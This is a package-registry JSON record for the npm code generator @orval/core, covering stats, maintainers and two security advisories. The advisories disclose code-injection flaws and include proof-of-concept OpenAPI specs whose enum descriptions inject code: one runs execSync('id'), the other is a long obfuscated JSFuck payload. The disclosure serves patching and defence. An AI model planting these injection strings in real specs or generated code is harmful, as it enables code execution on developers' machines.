{"id":5436011,"name":"@orval/core","ecosystem":"npm","description":null,"homepage":"https://orval.dev","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/orval-labs/orval","keywords_array":[],"namespace":"orval","versions_count":110,"first_release_published_at":"2022-11-16T15:13:07.403Z","latest_release_published_at":"2026-04-15T13:43:05.486Z","latest_release_number":"8.8.0","last_synced_at":"2026-04-16T16:12:49.912Z","created_at":"2022-11-18T00:11:11.079Z","updated_at":"2026-04-17T01:12:01.764Z","registry_url":"https://www.npmjs.com/package/@orval/core","install_command":"npm install @orval/core","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"alpha":"6.14.1","next":"7.0.1","rc":"8.0.0-rc.6","latest":"8.8.0"}},"repo_metadata":{"id":36980981,"uuid":"238402553","full_name":"orval-labs/orval","owner":"orval-labs","description":"orval is able to generate client with appropriate type-signatures (TypeScript) from any valid OpenAPI v3 or Swagger v2 specification, either in yaml or json formats. 🍺","archived":false,"fork":false,"pushed_at":"2026-04-09T14:18:25.000Z","size":24379,"stargazers_count":5655,"open_issues_count":167,"forks_count":580,"subscribers_count":13,"default_branch":"master","last_synced_at":"2026-04-09T15:06:53.827Z","etag":null,"topics":["angular","axios-client","codegen","faker","mock","msw","openapi-specification","orval","react","react-query","swagger","typescript"],"latest_commit_sha":null,"homepage":"https://orval.dev","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/orval-labs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["anymaniax","melloware","soartec-lab"]}},"created_at":"2020-02-05T08:31:50.000Z","updated_at":"2026-04-09T14:20:12.000Z","dependencies_parsed_at":"2026-01-08T21:04:56.230Z","dependency_job_id":null,"html_url":"https://github.com/orval-labs/orval","commit_stats":{"total_commits":1518,"total_committers":171,"mean_commits":8.87719298245614,"dds":0.422266139657444,"last_synced_commit":"47afdfaa77bd4ebf412614cd1f01965d849ec758"},"previous_names":["orval-labs/orval"],"tags_count":240,"template":false,"template_full_name":null,"purl":"pkg:github/orval-labs/orval","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/orval-labs","download_url":"https://codeload.github.com/orval-labs/orval/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":31846691,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-04-15T13:28:40.153Z","status":"ssl_error","status_checked_at":"2026-04-15T13:28:29.396Z","response_time":63,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"tags":[]},"repo_metadata_updated_at":"2026-04-16T16:13:09.965Z","dependent_packages_count":9,"downloads":5141042,"downloads_period":"last-month","dependent_repos_count":97,"rankings":{"downloads":0.4985567639776568,"dependent_repos_count":1.4926891509759292,"dependent_packages_count":2.421390119783199,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":1.470878678245595},"purl":"pkg:npm/%40orval/core","advisories":[{"uuid":"GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn","url":"https://github.com/advisories/GHSA-gch2-phqh-fg9q","title":"Orval has Code Injection via unsanitized x-enum-descriptions using JS comments","description":"[CVE-2026-23947](https://github.com/advisories/GHSA-h526-wf6g-67jv) had an incomplete fix\n\nWhile the current [jsStringEscape](https://github.com/orval-labs/orval/blob/02211fc413524be340ba9ace866a2ef68845ca7c/packages/core/src/utils/string.ts#L227) function properly handles single quotes ('), double quotes (\") and other characters, it fails to sanitize * and / characters. This allows attackers to break out of JavaScript comment blocks using */ sequences and inject arbitrary code into generated files.\n\n**Example:**\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Enum PoC\n  version: \"1.0.0\"\n\npaths:\n  /ping:\n    get:\n      operationId: ping\n      responses:\n        \"200\":\n          description: ok\n          content:\n            application/json:\n              schema:\n                $ref: \"#/components/schemas/EvilEnum\"\n\ncomponents:\n  schemas:\n    EvilEnum:\n      type: string\n      enum:\n        - PWNED\n      x-enumDescriptions:\n        # \"pwned */ }; import('child_process').then(cp =\u003e cp.execSync('touch pwned')); const a = { /*\"\n        - \"pwned */ }; [][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]]+(([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(+(+!+[]+[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+[!+[]+!+[]]+[+[]])+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[+[]]+(!![]+[])[+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]]+(!![]+[])[+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]+[+!+[]])[(![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]]((!![]+[])[+[]])[([][(!![]+[])[!+[]+!+[]+!+[]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]](([][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]]+![]+(![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])()[([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[+[]])[([![]]+[][[]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]]()[+!+[]+[+[]]])+[])[+!+[]])+([]+[])[(![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]()[+!+[]+[!+[]+!+[]]])()); const a = { /*\"\n\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-30T21:17:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/orval-labs/orval/security/advisories/GHSA-gch2-phqh-fg9q","https://github.com/orval-labs/orval/blob/02211fc413524be340ba9ace866a2ef68845ca7c/packages/core/src/utils/string.ts#L227","https://github.com/orval-labs/orval/releases/tag/v7.21.0","https://github.com/orval-labs/orval/releases/tag/v8.2.0","https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv","https://nvd.nist.gov/vuln/detail/CVE-2026-25141","https://github.com/advisories/GHSA-gch2-phqh-fg9q"],"source_kind":"github","identifiers":["GHSA-gch2-phqh-fg9q","CVE-2026-25141"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-30T22:00:07.881Z","updated_at":"2026-04-17T01:01:38.839Z","epss_percentage":0.00029,"epss_percentile":0.08348,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn","packages":[{"ecosystem":"npm","package_name":"@orval/core","versions":[{"first_patched_version":"8.2.0","vulnerable_version_range":"\u003e= 8.0.0, \u003c 8.2.0"},{"first_patched_version":"7.21.0","vulnerable_version_range":"\u003e= 7.19.0, \u003c 7.21.0"}],"purl":"pkg:npm/%40orval%2Fcore"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1nY2gyLXBocWgtZmc5cc4ABRvn/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","url":"https://github.com/advisories/GHSA-h526-wf6g-67jv","title":"Orval has a code injection via unsanitized x-enum-descriptions in enum generation","description":"### Impact\nArbitrary code execution in environments consuming generated clients\n\nThis issue is similar in nature to the recently-patched MCP vulnerability (CVE-2026-22785), but affects a different code path in @orval/core that was not addressed by that fix.\n\nThe vulnerability allows untrusted OpenAPI specifications to inject arbitrary TypeScript/JavaScript code into generated clients via the x-enumDescriptions field, which is embedded without proper escaping in getEnumImplementation(). I have confirmed that the injection occurs during const enum generation and results in executable code within the generated schema files.\n\n### Patches\nUpgrade to Orval 8.0.2\n\n### References\nAn example OpenAPI showing the issue:\n\n```yaml\nopenapi: 3.0.4\ninfo:\n  title: Enum PoC\n  version: \"1.0.0\"\n\npaths:\n  /ping:\n    get:\n      operationId: ping\n      responses:\n        \"200\":\n          description: ok\n          content:\n            application/json:\n              schema:\n                $ref: \"#/components/schemas/EvilEnum\"\n\ncomponents:\n  schemas:\n    EvilEnum:\n      type: string\n      enum:\n        - PWNED\n      x-enumDescriptions:\n        - \"pwned */ require('child_process').execSync('id'); /*\"\n```","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2026-01-21T01:01:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.3,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N","references":["https://github.com/orval-labs/orval/security/advisories/GHSA-h526-wf6g-67jv","https://nvd.nist.gov/vuln/detail/CVE-2026-23947","https://github.com/orval-labs/orval/commit/9e5d93533904936678ba93b5d20f6bca176a4e1e","https://github.com/orval-labs/orval/releases/tag/v8.0.2","https://github.com/orval-labs/orval/releases/tag/v7.19.0","https://github.com/advisories/GHSA-h526-wf6g-67jv"],"source_kind":"github","identifiers":["GHSA-h526-wf6g-67jv","CVE-2026-23947"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-01-21T02:00:07.955Z","updated_at":"2026-04-17T01:01:43.184Z","epss_percentage":0.00043,"epss_percentile":0.13079,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ","packages":[{"ecosystem":"npm","package_name":"@orval/core","versions":[{"first_patched_version":"7.19.0","vulnerable_version_range":"\u003c 7.19.0"},{"first_patched_version":"8.0.2","vulnerable_version_range":"\u003e= 8.0.0-rc.0, \u003c 8.0.2"}],"purl":"pkg:npm/%40orval%2Fcore"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1oNTI2LXdmNmctNjdqds4ABRUQ/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@orval/core","docker_dependents_count":1,"docker_downloads_count":18,"usage_url":"https://repos.ecosyste.ms/usage/npm/@orval/core","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@orval/core/dependencies","status":null,"funding_links":["https://github.com/sponsors/anymaniax","https://github.com/sponsors/melloware","https://github.com/sponsors/soartec-lab"],"critical":null,"issue_metadata":{"last_synced_at":"2026-04-15T12:01:36.404Z","issues_count":432,"pull_requests_count":831,"avg_time_to_close_issue":11906746.317647059,"avg_time_to_close_pull_request":584914.866847826,"issues_closed_count":255,"pull_requests_closed_count":736,"pull_request_authors_count":141,"issue_authors_count":307,"avg_comments_per_issue":2.0625,"avg_comments_per_pull_request":1.0974729241877257,"merged_pull_requests_count":607,"bot_issues_count":1,"bot_pull_requests_count":204,"past_year_issues_count":140,"past_year_pull_requests_count":237,"past_year_avg_time_to_close_issue":595229.65,"past_year_avg_time_to_close_pull_request":232670.96648044692,"past_year_issues_closed_count":60,"past_year_pull_requests_closed_count":179,"past_year_pull_request_authors_count":65,"past_year_issue_authors_count":105,"past_year_avg_comments_per_issue":1.0785714285714285,"past_year_avg_comments_per_pull_request":1.0886075949367089,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":36,"past_year_merged_pull_requests_count":149,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/orval-labs%2Forval/issues","maintainers":[{"login":"soartec-lab","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/soartec-lab"},{"login":"anymaniax","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anymaniax"},{"login":"melloware","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/melloware"}],"active_maintainers":[{"login":"soartec-lab","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/soartec-lab"},{"login":"melloware","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/melloware"},{"login":"anymaniax","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anymaniax"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@orval%2Fcore/codemeta","maintainers":[{"uuid":"melloware","login":"melloware","name":null,"email":"mellowaredev@gmail.com","url":null,"packages_count":21,"html_url":"https://www.npmjs.com/~melloware","role":null,"created_at":"2025-08-25T15:17:18.263Z","updated_at":"2025-08-25T15:17:18.263Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/melloware/packages"},{"uuid":"anymaniax","login":"anymaniax","name":null,"email":"anymaniax@icloud.com","url":null,"packages_count":26,"html_url":"https://www.npmjs.com/~anymaniax","role":null,"created_at":"2022-11-18T00:30:30.238Z","updated_at":"2022-11-18T00:30:30.238Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/anymaniax/packages"}]}